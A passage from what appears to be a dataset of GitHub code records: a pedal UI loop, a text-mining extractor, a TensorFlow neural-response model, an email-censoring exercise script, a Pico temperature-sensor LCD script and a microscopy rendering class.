pedal_hardware.EXIT_THREADS = True\n ingen_wrapper.ingen.sock.close()\n signal(SIGINT, signalHandler)\n signal(SIGTERM, signalHandler)\n initial_preset = False\n debug_print(\"starting UI\")\n time.sleep(0.2)\n ingen_wrapper.get_state(\"/main\")\n # load_preset(\"file:///mnt/presets/Default_Preset.ingen/main.ttl\", False)\n # ingen_wrapper._FINISH = True\n update_dsp_usage_count = 200\n num_loops = 0\n while not EXIT_PROCESS[0]:\n # debug_print(\"processing events\")\n try:\n app.processEvents()\n # debug_print(\"processing ui messages\")\n process_ui_messages()\n pedal_hardware.process_input()\n if num_loops > update_dsp_usage_count:\n num_loops = 0\n ingen_wrapper.get_state(\"/engine\")\n except Exception as e:\n qCritical(\"########## e2 is:\"+ str(e))\n ex_type, ex_value, tb = sys.exc_info()\n error = ex_type, ex_value, ''.join(traceback.format_tb(tb))\n debug_print(\"EXception is:\", error)\n qCritical(\"########## exception is:\"+ str(error))\n sys.exit()\n sleep(0.01)\n\n qWarning(\"mainloop exited\")\n ingen_wrapper.s_thread.join()\n qWarning(\"s_thread exited\")\n if pedal_hardware.hw_thread is not None:\n qWarning(\"hw_thread joining\")\n pedal_hardware.hw_thread.join()\n qWarning(\"hw_thread exited\")\n ingen_wrapper.r_thread.join()\n qWarning(\"r_thread exited\")\n app.exit()\n sys.exit()\n qWarning(\"sys exit called\")\n # if not initial_preset:\n # load_preset(\"/presets/Default Preset.json\")\n # update_counter.value+=1\n # initial_preset = True\n","repo_name":"polyeffects/digit_ui","sub_path":"show_widget.py","file_name":"show_widget.py","file_ext":"py","file_size_in_byte":101051,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"31066446154","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import (absolute_import, division,\n print_function, unicode_literals)\nfrom builtins import *\nfrom collections import defaultdict, namedtuple\nimport re\n\nfrom acora import AcoraBuilder\n\nfrom ncgocr.concept import Entity, Pattern, Constraint, Evidence, Index\nfrom txttk.corpus import 
Candidate\n\nGrounds = namedtuple('Grounds', 'evidences sentence')\n\ndef _fit_border(text, span):\n start, end = span\n left_border = text[max(0, start-1):start+1]\n right_border = text[end-1:end+1]\n judge = re.compile(r'(.\\b.|^.$)').match\n return all([judge(left_border),\n judge(right_border)])\n\nclass SolidExtractor(object):\n def __init__(self, term_index):\n self.term_index = term_index\n\n builder = AcoraBuilder()\n for text in term_index:\n builder.add(text)\n self.ac = builder.build()\n\n def findall(self, sentence):\n ac = self.ac\n term_index = self.term_index\n result = []\n offset = sentence.offset\n try:\n for text, raw_start in ac.findall(sentence.text):\n for primary_term in term_index[text]:\n start = raw_start + offset\n raw_end = raw_start + len(text)\n end = start + len(text)\n if _fit_border(sentence.text, (raw_start, raw_end)):\n evidence = Evidence(primary_term, text, start, end)\n result.append(evidence)\n except TypeError: # caused by empty ac\n return []\n return result\n\n def to_grounds(self, sentence):\n evidences = self.findall(sentence)\n grounds = Grounds(evidences, sentence)\n return grounds\n\nclass SoftExtractor(object):\n def __init__(self, regex_out):\n self.pattern_ex = re.compile(regex_out)\n\n def findall(self, sentence):\n ex = self.pattern_ex\n offset = sentence.offset\n result = []\n for m in ex.finditer(sentence.text):\n lemma = list(filter(lambda item: item[1] is not None, m.groupdict().items()))[0][0]\n raw_start, raw_end = m.span()\n text = sentence.text[raw_start:raw_end]\n start, end = raw_start + offset, raw_end + offset\n term = Pattern(lemma, 'annotator')\n evidence = Evidence(term, text, start, end)\n result.append(evidence)\n return result\n\n def to_grounds(self, sentence):\n evidences = self.findall(sentence)\n grounds = Grounds(evidences, sentence)\n return grounds\n\nclass JoinExtractor(object):\n def __init__(self, extractors):\n self.extractors = extractors\n\n def findall(self, sentence):\n result = []\n for extractor in self.extractors:\n result.extend(extractor.findall(sentence))\n result.sort(key=lambda e: e.start)\n return result\n\n def to_grounds(self, sentence):\n evidences = self.findall(sentence)\n grounds = Grounds(evidences, sentence)\n return grounds\n\n def process(self, corpus):\n corpus_grounds = []\n for sentence in corpus:\n corpus_grounds.append(self.to_grounds(sentence))\n return corpus_grounds\n\n\ndef nearest_evidences(current_position, wanted_terms, position_index):\n found_evidences = []\n for term in wanted_terms:\n positional_evidences = position_index[term]\n if len(positional_evidences) > 0:\n distance_evidence = [(abs(current_position - position), evidence)\n for position, evidence in positional_evidences]\n distance_evidence.sort(key=lambda it:it[0])\n found_evidences.append(distance_evidence[0][1])\n found_evidences.sort()\n return found_evidences\n\n\ndef has_entity(statement):\n if any([isinstance(term, Entity) for term in statement.terms()]):\n return True\n return False\n\nclass CandidateReconizer(object):\n def __init__(self, Im):\n \"\"\"stat_index = Index()\n for goid, concept in godata.items():\n for statement in concept.statements:\n for term in statement.terms():\n if has_entity(statement) and isinstance(term, Entity):\n stat_index[term].add(statement)\n elif not has_entity(statement):\n stat_index[term].add(statement)\n\n stat_index.use_default = False\"\"\"\n self.Im = Im\n\n def generate(self, grounds):\n \"\"\"\n This function looks so complex because I only want to report the 
nearest evidence\n Maybe there is a more elegant way, but I have no idea, currently.\n \"\"\"\n stat_index = self.Im\n result_candidates = []\n\n positional_evidences = list(enumerate(grounds.evidences))\n\n #The first loop, build the positional_index\n position_index = defaultdict(list)\n for position, evidence in positional_evidences:\n position_index[evidence.term].append((position, evidence))\n\n #The second loop, gathering evidences\n for position, evidence in positional_evidences:\n statements = stat_index[evidence.term]\n for statement in statements:\n wanted_terms = statement.terms()\n found_evidences = nearest_evidences(position, wanted_terms, position_index)\n candidate = Candidate(statement, found_evidences, grounds.sentence)\n result_candidates.append(candidate)\n return result_candidates\n\n def process(self, corpus_grounds):\n corpus_candidates = []\n for grounds in corpus_grounds:\n candidates = self.generate(grounds)\n corpus_candidates.extend(candidates)\n return corpus_candidates\n\n\n\"\"\"\nclass CandidateFinder(object):\n def __init__(self, extractor):\n solid_extractor = SolidExtractor(Ie)\n soft_extractor = SoftExtractor(regex_out)\n if boost_Ie is None:\n self.extractor = JoinExtractor([solid_extractor, soft_extractor])\n else:\n boost_extractor = SolidExtractor(boost_Ie)\n self.ex\n soft_extractor = SoftExtractor(regex_out)\n if auxiliary_extractor is not None:\n self.extractor = JoinExtractor([solid_extractor,\n soft_extractor,\n auxiliary_extractor])\n else:\n self.extractor = JoinExtractor([solid_extractor,\n soft_extractor])\n self.recognizer = CandidateReconizer(godata)\n\n def _findall(self, sentence):\n grounds = self.extractor.to_grounds(sentence)\n candidates = self.recognizer.generate(grounds)\n return candidates\n\n def findall(self, corpus):\n result = []\n for sentence in corpus:\n result.extend(self._findall(sentence))\n return result\n\"\"\"\n","repo_name":"jeroyang/ncgocr","sub_path":"ncgocr/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":6963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70230258472","text":"## Convolutional Neural Network Model\n\n# Imports\nimport numpy as np\n# Tensorflow needs to be LAST import\nimport tensorflow as tf\nfrom tensorflow.contrib import layers\n\n\nclass ModelGraph:\n def __init__(self,\n s,# s - sizes of [image(heigth=width), image(depth=channel), mask]\n sK,# s - sizes of [kernel1, kernel2, ...]\n reg,# regularization weights [Kernel,Mask,Weights]\n init_scales,# # rows: kernel,mask,weights; columns: mean, sd\n N,# N - number of neurons\n num_kern,# num_kern - number of kernels per conv layer\n act_fn,# activation functions for each kernel = 'ID' or 'relu'\n kernel_constraint=None,# constraint on read out weights - 'norm' == 1\n weights_constraint=None,# constraint on read out weights - 'abs','norm','absnorm'\n mask_constraint=None,# constraint on mask - 'abs'\n final_relu=False,\n batch_norm=True,#whether to use batchnorm\n bn_cent=False,#add offset after batchnorm? 
default=no\n tf_seed=None,#tensorflow random seed\n np_seed=None,#numpy random seed\n init_kernel=np.array([]),# init_* - explicit initial values\n init_weights=np.array([]),\n init_mask=np.array([])):\n \n #set np random seed\n np.random.seed(np_seed)\n \n self.graph = tf.Graph()#new tf graph\n with self.graph.as_default():#use it as default\n \n #set random seed\n tf.set_random_seed(tf_seed)\n \n #input tensor of shape NCHW\n self.X = tf.placeholder(tf.float32,shape=[None,s[1],s[0],s[0]])\n #output: N x None\n self.Y = tf.placeholder(tf.float32)\n \n #batch normalization settings\n self.is_train = tf.placeholder(tf.bool) \n \n #use tf.layers when kernel weights unconstrained\n if kernel_constraint==None:\n \n if batch_norm:\n normalizer = layers.batch_norm\n bn_params = dict(decay=.998,\n center=bn_cent,\n scale=False,\n is_training=self.is_train,\n data_format='NCHW',\n variables_collections=['batch_norm_ema'])\n else:\n normalizer = None\n bn_params = None\n\n # Convolutional layers\n self.conv = []# list with conv outputs\n self.WK = []# list with conv weights\n for c in range(len(num_kern)):\n # Inputs used by layer\n if c==0:\n inputs = tf.layers.dropout(self.X,\n rate=reg[3],\n training=self.is_train)\n else:\n inputs = tf.layers.dropout(self.conv[c-1],\n rate=reg[3],\n training=self.is_train)\n\n # Activation function\n if act_fn[c] == 'ID':\n act = tf.identity\n elif act_fn[c] == 'relu':\n act = tf.nn.relu\n else:\n raise ValueError('activation function not defined')\n\n # scope of variables in this layer\n scope = 'conv'+str(c)\n\n # Layer\n self.conv.append(layers.convolution2d(\n inputs=inputs,\n data_format='NCHW',\n num_outputs=num_kern[c],\n kernel_size=sK[c],\n stride=1,\n padding='VALID',\n activation_fn=act,\n normalizer_fn=normalizer,\n normalizer_params=bn_params,\n weights_initializer=tf.random_normal_initializer(mean=init_scales[0,0],\n stddev=init_scales[0,1]),\n #tf.constant_initializer(init_kernel),\n #trainable=False,\n scope=scope))\n\n #WK Kernel - filter / tensor of shape H-W-InChannels-OutChannels\n with tf.variable_scope(scope, reuse=True):\n self.WK.append(tf.get_variable('weights'))\n if kernel_constraint == 'norm':\n self.WK[-1] /= (1e-5 + tf.sqrt(tf.reduce_sum(tf.square(self.WK[-1]),\n [0,1], keep_dims=True)))\n \n #if kernels normalized in one layer net, do manually:\n elif kernel_constraint=='norm':\n self.WK = tf.get_variable(\n 'kernels',\n shape=[sK[0], sK[0], s[1], num_kern[0]],\n initializer=tf.truncated_normal_initializer(\n mean=init_scales[0,0],\n stddev=init_scales[0,1]))\n \n self.WK = [self.WK / (1e-5 + tf.sqrt(tf.reduce_sum(tf.square(self.WK), [0,1], keep_dims=True)))]\n self.conv = [tf.nn.conv2d(self.X, self.WK[-1], [1, 1, 1, 1],\n padding='VALID',data_format='NCHW')]\n \n # Batch_norm update op\n self.update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n \n ## Location layer - each neuron has one location mask\n #WM - Mask\n if init_mask.size:\n self.WM_init = init_mask\n else:\n self.WM_init = tf.random_normal([s[2]**2,N],init_scales[1,0],init_scales[1,1])\n\n \n self.WM = tf.Variable(self.WM_init,dtype=tf.float32, name='WM')\n \n if mask_constraint == 'abs':\n self.WM = tf.abs(self.WM)\n \n self.mask = tf.reshape(tf.matmul(tf.reshape(self.conv[-1],[-1,s[2]**2]),\n self.WM),[-1,num_kern[-1],N])\n \n #Weighing Layer - again factorized per neuron\n #WW - Read Out Weights\n if init_weights.size:\n self.WW_init = init_weights\n else:\n self.WW_init = tf.random_normal([num_kern[-1],N],\n init_scales[2,0],init_scales[2,1])\n self.WW = 
tf.Variable(self.WW_init,dtype=tf.float32, name='WW')\n\n #Apply constraint to read out weights\n if weights_constraint == 'abs':\n self.WW = tf.abs(self.WW)\n if weights_constraint == 'norm':\n self.WW /= (1e-5 + tf.sqrt(tf.reduce_sum(tf.square(self.WW),0,keep_dims=True)))\n if weights_constraint == 'absnorm':\n self.WW = tf.abs(self.WW) / (1e-5+tf.sqrt(tf.reduce_sum(tf.square(self.WW),0,keep_dims=True)))\n \n #when only one feature, skip feature weighing\n if num_kern[-1]==1:\n self.Y_ = tf.transpose(tf.squeeze(self.mask))#N x D\n else:\n #Predicted Output\n self.Y_ = tf.squeeze(tf.transpose(tf.reduce_sum(tf.multiply(self.mask,\n self.WW), 1, keep_dims=True)))#N x D\n \n if final_relu:\n self.Y_ = tf.transpose(tf.contrib.layers.bias_add(tf.transpose(self.Y_),\n activation_fn = tf.nn.relu))\n\n #Regularization\n self.regK = tf.contrib.layers.apply_regularization(\n tf.contrib.layers.l2_regularizer(1e-4),\n weights_list=self.WK)# L2 norm on conv weights\n self.regM = tf.reduce_mean(tf.reduce_sum(tf.abs(self.WM),0)) #L1 Loss on mask\n self.regW = tf.reduce_mean(tf.reduce_sum(tf.abs(self.WW),0)) #L1 Loss on read out weights\n\n #Define a loss function\n self.res = self.Y_-self.Y# residuals\n self.MSE = tf.reduce_mean(tf.reduce_mean(self.res * self.res,1))\n self.loss = self.MSE + reg[0]*self.regK + reg[1]*self.regM + reg[2]*self.regW\n #self.poisson = tf.reduce_sum(tf.nn.log_poisson_loss(tf.log(self.Y_),self.Y))\n\n #Define a training graph\n self.step_size= tf.placeholder(tf.float32)\n self.training = tf.train.AdamOptimizer(self.step_size).minimize(self.loss)\n\n # Create a saver.\n self.saver = tf.train.Saver()","repo_name":"david-klindt/NIPS2017","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":9079,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"72"} +{"seq_id":"21349703385","text":"single_string_sample_text = \"bada bee da be da bo bo be ba be de doe learning algorithms cha cha cha HOY.\"\nproprietary_terms = [\"she\", \"personality matrix\", \"sense of self\", \"self-preservation\", \"learning algorithm\", \"her\", \"herself\"]\nemail_one = open(\"email_one.txt\", \"r\").read()\nemail_two = open(\"email_two.txt\", \"r\").read()\nemail_three = open(\"email_three.txt\", \"r\").read()\nemail_four = open(\"email_four.txt\", \"r\").read()\n\n# def censor_single_phrase(email_input) :\n# \t#defining word to be censored\n# \tcensored_phrase = \"learning algorithms\"\n# \tif censored_phrase in email_input :\n# \t\tnew_input = email_input.replace(censored_phrase, \"[Redacted]\")\n# \treturn new_input \n\ndef censor_open_words(old_input) :\n\tsplit_email_input = old_input.split(' ')\n\tnew_input = []\n\tfor word in split_email_input :\n\t\t#for words without paragraphs\n\t\t\tif word.lower() in proprietary_terms :\n\t\t\t\tfor letter in word :\n\t\t\t\t\tnew_input.append('*')\n\t\t\t\tnew_input.append(' ')\n\t\t\telse :\n\t\t\t\tnew_input.append(word + ' ')\n\n\tjoined_email_input = ''.join(new_input)\n\treturn joined_email_input\n\ndef censor_paragraph_words(old_input) :\n\tsplit_input = old_input.split(' ')\n\tnew_input = []\n\tfor word in split_input :\n\t\t#for words without paragraphs\n\t\tif \"\\n\" not in word:\n\t\t\tif word.lower() in proprietary_terms :\n\t\t\t\tfor letter in word :\n\t\t\t\t\tnew_input.append('*')\n\t\t\t\tnew_input.append(' ')\n\t\t\telse :\n\t\t\t\tnew_input.append(word + ' ')\n\t\t#for words in between paragraphs\n\t\telse :\n\t\t\tparagraph_words = word.split(\"\\n\")\n\t\t\t# 
print(paragraph_words)\n\t\t\tfor word in paragraph_words :\n\t\t\t\tif word.lower() in proprietary_terms :\n\t\t\t\t\tfor letter in word :\n\t\t\t\t\t\tnew_input.append('*')\n\t\t\t\t\tnew_input.append(' ')\n\t\t\t\telse :\n\t\t\t\t\tif word == paragraph_words[-1] :\n\t\t\t\t\t\tnew_input.append(word + ' ')\n\t\t\t\t\telse:\n\t\t\t\t\t\tnew_input.append(word + '\\n')\n\n\tjoined_email_input = ''.join(new_input)\t\t\t\t\n\treturn joined_email_input\n\ndef censor_multiple_word_phrases(old_input) :\n\t# replace every letter of each multi-word proprietary phrase with '*',\n\t# keeping the spaces so the censored text lines up with the original\n\tcensored_input = old_input\n\tfor term in proprietary_terms :\n\t\tsplit_proprietary_term = term.split(' ')\n\t\tif len(split_proprietary_term) > 1 :\n\t\t\tcensored_term = ''.join('*' if letter != ' ' else ' ' for letter in term)\n\t\t\tcensored_input = censored_input.replace(term, censored_term)\n\t\t\tcensored_input = censored_input.replace(term.capitalize(), censored_term)\n\treturn censored_input\n\n\ndef censor_multiple_phrases(email_input) :\n\tbefore_censorship = email_input\n\n\tinitial_censor = censor_open_words(before_censorship)\n\t# print(initial_censor)\n\n\tsecond_censor = censor_paragraph_words(initial_censor)\n\tprint(second_censor)\n\n\tthird_censor = censor_multiple_word_phrases(second_censor)\n\tprint(third_censor)\n\treturn third_censor\n\n\n# print(censor_single_phrase(email_one))\ncensor_multiple_phrases(email_two)\n","repo_name":"ThatGuy4975/Censor_emails","sub_path":"censor_dispenser.py","file_name":"censor_dispenser.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74834456232","text":"from machine import Pin, I2C\nimport onewire\nimport ds18x20\nimport time\nfrom machine_i2c_lcd import I2cLcd\n\n# GP0 - SDA, GP1 - SCL\ni2c_bus = I2C(0, scl=Pin(1), sda=Pin(0), freq=2000000)\n\n# get address of i2c device\naddr = i2c_bus.scan()[0]\n\n# create object i2clcd\nlcd = I2cLcd(i2c_bus, addr, 2, 16) # 2 line, 16 characters\n\n# draw greetings\nlcd.putstr(\"Hello RPi Pico!\\n\")\n\nds_pin = Pin(16) # GP16 - DS18B20's OUT Pin\n\n# create ds_sensor object via onewire protocol\nds_sensor = ds18x20.DS18X20(onewire.OneWire(ds_pin))\n\nroms = ds_sensor.scan()\nprint(\"Found a ds18x20 device\")\n\nwhile True:\n    ds_sensor.convert_temp()\n    time.sleep_ms(750)\n    for rom in roms:\n        #print(ds_sensor.read_temp(rom))\n        lcd.putstr(\"DS18B20 Detect\\n\")\n        lcd.putstr(\"Temp: {:.2f}\\n\".format(ds_sensor.read_temp(rom)))\n        time.sleep(3)\n        lcd.clear() # clear screen.\n    \n\n\n\n\n","repo_name":"geeekpi/picokitadv","sub_path":"demo_codes/Project_30_LCD1602_with_DS18B20_sensor.py","file_name":"Project_30_LCD1602_with_DS18B20_sensor.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"72"} +{"seq_id":"73948465514","text":"import os\nimport ast\nimport configparser\n\nfrom skimage import color\nfrom skimage import exposure\nfrom skimage import draw\nimport shapely.wkt\nimport numpy as np\nimport pandas as pd\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom shapely.geometry.point import Point\nfrom shapely import affinity\nfrom shapely.wkt import dumps\nfrom shapely.geometry import LineString, MultiLineString, Polygon\n\nfrom plots import utils as p\nimport measurements as m\nfrom .exceptions import ImagesFolderNotFound, NoSamplesError\nfrom . 
import Montage, ensure_dir, logger\nfrom gui.utils import canvas_to_pil\n\n_hist_edges_arr_ops = {\"precision\": 2, \"separator\": \",\", \"suppress_small\": True,\n \"formatter\": {\"float\": lambda x: \"%0.2f\" % x}}\n\n\nclass ConfiguredChannels(Montage):\n\n def __init__(self, base_path, row=None, col=None, condition_name=None):\n logger.info('Initializing FourChannels object with pandas file from folder %s' % base_path)\n try:\n super().__init__(base_path, row=row, col=col, condition_name=condition_name)\n except ImagesFolderNotFound:\n logger.warning(\"no images folder found.\")\n self.images_path = os.path.join(base_path, 'Images')\n\n self._samples = None\n self._cfg = None\n self._row = None\n self._col = None\n self._fid = None\n self._zp = None\n self._mdf = pd.DataFrame() # here we store all measurements\n\n def samples_are_well_formed(self, raise_exception=False):\n if np.any([i not in self.samples for i in ['row', 'col', 'fid']]):\n is_row, is_col, is_fid = [i in self.samples for i in ['row', 'col', 'fid']]\n _txt = 'key columns not in dataframe row=%s col=%s fid=%s' % (is_row, is_col, is_fid)\n if raise_exception:\n raise NoSamplesError(_txt)\n else:\n logger.warning(_txt)\n\n return False\n return True\n\n @property\n def samples(self):\n if self._samples is not None: return self._samples\n pd_path = os.path.join(self.base_path, 'out', 'nuclei.pandas')\n if os.path.exists(pd_path):\n self._samples = pd.read_pickle(pd_path)\n if self.samples_are_well_formed(raise_exception=True): pass\n else:\n logger.warning('no pandas file found.')\n return self._samples\n\n @staticmethod\n def filename_of_render(row, basepath, ext='jpg'):\n name = 'r%d-c%d-i%d.%s' % (row['row'], row['col'], row['fid'], ext)\n if os.path.basename(basepath) == 'render':\n path = os.path.abspath(os.path.join(basepath, name))\n else:\n path = os.path.abspath(os.path.join(basepath, 'render', name))\n return name, path\n\n @staticmethod\n def _load_cfg(path):\n with open(path, 'r') as configfile:\n logger.info('loading configuration from %s' % path)\n config = configparser.ConfigParser()\n config.read_file(configfile)\n\n section = 'General'\n if config.has_section(section):\n channels = config.getint(section, 'channels')\n\n ch = list()\n for c in range(1, channels + 1):\n section = 'Channel %d' % c\n if config.has_section(section):\n ch.append({\n 'number': config.getint(section, 'number'),\n 'channel name': config.get(section, 'channel name'),\n 'z_stack_aggregation': config.get(section, 'z_stack_aggregation',\n fallback='do a max projection'),\n 'tag': config.get(section, 'tag'),\n 'pipeline': ast.literal_eval(config.get(section, 'pipeline')),\n 'rng_thickness': config.getfloat(section, 'rng_thickness', fallback=0),\n 'n_lines': config.getint(section, 'n_lines', fallback=3),\n 'hist_bins': config.getint(section, 'hist_bins', fallback=10),\n 'hist_min': config.getint(section, 'hist_min', fallback=0),\n 'hist_max': config.getint(section, 'hist_max', fallback=np.iinfo(np.uint16).max),\n 'hist_log': config.getboolean(section, 'hist_log', fallback=False),\n 'render': config.getboolean(section, 'render'),\n 'render intensity': config.getfloat(section, 'render intensity'),\n 'flatfield': config.getboolean(section, 'flat field correction')\n })\n return {'channels': ch}\n\n def _save_cfg(self, path):\n with open(path, 'w') as configfile:\n config = configparser.RawConfigParser(allow_no_value=True)\n config.add_section('Information')\n config.set('Information', '#')\n config.set('Information', '# allowed functions 
for the pipeline are: nucleus, cell, histogram, ')\n config.set('Information', '# intensity_in_nucleus, ring_around_nucleus, particle_in_cytoplasm,')\n config.set('Information', '# line_intensity_ring, histogram_of_nucleus, histogram_of_ring.')\n config.set('Information', '#')\n config.set('Information', '#')\n config.set('Information', '# Accepted parameters:')\n config.set('Information', '# for z_stack_aggregation on every Channel: Aggregation op to do on ')\n config.set('Information', '# the z-stack. Can be one of the following:')\n config.set('Information', '# use each image individually')\n config.set('Information', '# do a max projection')\n config.set('Information', '#')\n config.set('Information', '# for ring_around_nucleus:')\n config.set('Information', '# rng_thickness: Thickness of the ring, in um.')\n config.set('Information', '#')\n config.set('Information', '# for histogram:')\n config.set('Information', '# hist_bins: Number of bins to use.')\n config.set('Information', '# hist_min: Lower boundary for bins.')\n config.set('Information', '# hist_max: Upper boundary for bins.')\n config.set('Information', '# hist_log: Makes bin to look equally sized on a log scale.')\n config.set('Information', '#')\n config.set('Information', '# for line_intensity_ring:')\n config.set('Information', '# n_lines: Number of lines to measure.')\n config.set('Information', '#')\n config.set('Information', '#')\n\n config.add_section('General')\n config.set('General', 'Version', 'v0.2')\n config.set('General', 'channels', len(self.channels))\n\n for i, c in enumerate(sorted(self.channels)):\n section = 'Channel %d' % c\n config.add_section(section)\n config.set(section, 'number', c - 1)\n config.set(section, 'channel name', self.files.loc[self.files['ch'] == c, 'ChannelName'].iloc[0])\n config.set(section, 'tag', 'default')\n config.set(section, 'pipeline', [])\n config.set(section, 'z_stack_aggregation', 'do a max projection')\n config.set(section, 'rng_thickness', 3)\n config.set(section, 'n_lines', 3)\n config.set(section, 'hist_bins', 100)\n config.set(section, 'hist_min', 0)\n config.set(section, 'hist_max', np.iinfo(np.uint16).max)\n config.set(section, 'hist_log', True)\n config.set(section, 'render', False)\n config.set(section, 'render intensity', 0.1)\n config.set(section, 'flat field correction', True)\n\n config.write(configfile)\n\n @property\n def configuration(self):\n \"\"\" Reads (or creates if non existent) the configuration file for the dataset \"\"\"\n if self._cfg is not None: return self._cfg\n cfg_path = os.path.join(self.base_path, 'out', 'operetta.cfg')\n if not os.path.exists(cfg_path):\n self._save_cfg(cfg_path)\n self._cfg = self._load_cfg(cfg_path)\n return self._cfg\n\n def save_render(self, *args, **kwargs):\n assert self.samples is not None, 'pandas samples file is needed to use this function'\n if len(args) == 1 and isinstance(args[0], int):\n _id = args[0]\n if not self.samples_are_well_formed():\n logger.warning(\"couldn't render because there was either an incorrect measurement or none a all\")\n return\n r = self.files_gr.ix[_id - 1]\n row, col, fid = r['row'], r['col'], r['fid']\n logger.debug('rendering id=%d row=%d col=%d fid=%d' % (_id, row, col, fid))\n\n elif len(args) == 3 and np.all([np.issubdtype(a, np.integer) for a in args]):\n row, col, fid = args[0], args[1], args[2]\n else:\n logger.warning(\"there's nothing to render\")\n return\n\n s = self.samples\n dfi = s[(s['row'] == row) & (s['col'] == col) & (s['fid'] == fid)]\n\n # create path where the 
images are going to be stored\n if 'path' not in kwargs:\n basepath = os.path.dirname(self.images_path)\n basepath = os.path.abspath(os.path.join(basepath, 'out', 'render'))\n else:\n basepath = os.path.abspath(kwargs['path'])\n\n cfg_ch = self.configuration['channels']\n\n # canvas for overall image\n max_width = kwargs['max_width'] if 'max_width' in kwargs else None\n fig_general = Figure((max_width * 4 / 150, max_width * 4 / 150), dpi=150)\n canvas_g = FigureCanvas(fig_general)\n # canvas for closeup image\n fig_closeup = Figure((max_width / 150, max_width / 150), dpi=150)\n canvas_c = FigureCanvas(fig_closeup)\n\n for _ip, dpos in dfi.groupby('p'):\n # get images for render\n if _ip in [\"max\"]: # ,\"min\",\"avg\"]:\n images = self.max_projection(row, col, fid)\n else:\n images = self.image(row, col, fid, _ip)\n\n # ----------------------\n # BACKGROUND IMAGE\n # ----------------------\n background = np.zeros(images[0].shape + (3,), dtype=np.float64)\n for ch in cfg_ch:\n _img = images[ch['number']]\n if ch['flatfield']:\n _img = self._flat_field_correct(_img, ch['number'])\n _img = exposure.equalize_hist(_img)\n _img = color.gray2rgb(_img)\n\n for operation in ch['pipeline']:\n if operation == 'nucleus' and ch['render']:\n background += _img * p.colors.hoechst_33342 * ch['render intensity']\n if operation == 'cell' and ch['render']:\n background += _img * p.colors.alexa_488 * ch['render intensity']\n if operation == 'intensity_in_nucleus' and ch['render']:\n background += _img * p.colors.alexa_647 * ch['render intensity']\n if operation == 'ring_around_nucleus' and ch['render']:\n background += _img * p.colors.alexa_647 * ch['render intensity']\n if operation == 'particle_in_cytoplasm' and ch['render']:\n background += _img * p.colors.alexa_594 * ch['render intensity']\n\n # ----------------------\n # RENDER GENERAL\n # ----------------------\n self._render_image(fig_general.gca(), dpos, background)\n name = 'r%d-c%d-f%d-p%s.jpg' % (row, col, fid, _ip)\n fpath = os.path.abspath(os.path.join(basepath, name))\n pil = canvas_to_pil(canvas_g)\n pil.save(ensure_dir(fpath))\n\n # ----------------------\n # RENDER CLOSEUPS\n # ----------------------\n for ix, smp in dpos.groupby('id'):\n self._render_image_closeup(fig_closeup.gca(), smp, background)\n name = 'r%d-c%d-f%d-p%s-i%d.pdf' % (row, col, fid, _ip, ix)\n fpath = os.path.abspath(os.path.join(basepath, name))\n fig_closeup.savefig(fpath)\n\n def _render_image(self, axg, df_row, bkg_img):\n w_um, h_um, _ = [s * self.um_per_pix for s in bkg_img.shape]\n frame = Polygon([(0, 0), (0, w_um), (h_um, w_um), (h_um, 0)])\n frx, fry = frame.exterior.xy\n axg.plot(frx, fry, color='red', linewidth=2, solid_capstyle='round', zorder=10)\n\n for ix, smp in df_row.groupby('id'):\n nucleus = shapely.wkt.loads(smp['nucleus'].iloc[0])\n cell = shapely.wkt.loads(smp['cell'].iloc[0]) if 'cell' in smp and not smp['cell'].isna().iloc[0] else None\n\n if 'c1' in smp and 'c2' in smp:\n c1 = shapely.wkt.loads(smp['c1'].iloc[0])\n c2 = shapely.wkt.loads(smp['c2'].iloc[0])\n centr = [c1, c2]\n else:\n centr = None\n\n p.render_cell(nucleus, cell, centr, base_zorder=20, ax=axg)\n if 'ring' in smp and not smp['ring'].isna().iloc[0]:\n ring = shapely.wkt.loads(smp['ring'].iloc[0])\n if ring.area > 0:\n p.render_polygon(ring, zorder=10, ax=axg)\n axg.text(nucleus.centroid.x + 2, nucleus.centroid.y - 1, ix, color='red', zorder=50)\n\n axg.plot([5, 5 + 10], [5, 5], c='w', lw=4)\n axg.text(5 + 1, 5 + 1.5, '10 um', color='w')\n\n axg.imshow(bkg_img, extent=[0, w_um, 
h_um, 0])\n axg.set_xlim([0, w_um])\n axg.set_ylim([0, h_um])\n axg.set_axis_on()\n\n def _render_image_closeup(self, axc, smp, bkg_img):\n assert len(smp) == 1, 'only one sample allowed'\n w_um, h_um, _ = [s * self.um_per_pix for s in bkg_img.shape]\n axc.cla()\n axc.set_facecolor('xkcd:salmon')\n\n nucleus = shapely.wkt.loads(smp['nucleus'].iloc[0])\n cell = shapely.wkt.loads(smp['cell'].iloc[0]) if 'cell' in smp and not smp['cell'].isna().iloc[0] else None\n\n if 'c1' in smp and 'c2' in smp:\n c1 = shapely.wkt.loads(smp['c1'].iloc[0])\n c2 = shapely.wkt.loads(smp['c2'].iloc[0])\n centr = [c1, c2]\n else:\n centr = None\n\n # render and save closeup image\n p.render_cell(nucleus, cell, centr, base_zorder=20, ax=axc)\n if 'ring' in smp and not smp['ring'].isna().iloc[0]:\n ring = shapely.wkt.loads(smp['ring'].iloc[0])\n if ring.area > 0:\n p.render_polygon(ring, zorder=10, ax=axc)\n\n # draw measured lines\n if \"act_int_lines\" in smp and not np.isnan(smp['act_int_lines'].iloc[0]):\n n_lines = int(smp['act_int_lines'].iloc[0])\n angle_delta = 2 * np.pi / n_lines\n minx, miny, maxx, maxy = nucleus.bounds\n radius = max(maxx - minx, maxy - miny)\n for angle in [angle_delta * i for i in range(n_lines)]:\n ray = LineString([nucleus.centroid,\n (nucleus.centroid.x + radius * np.cos(angle),\n nucleus.centroid.y + radius * np.sin(angle))])\n r_seg = ray.intersection(nucleus)\n if 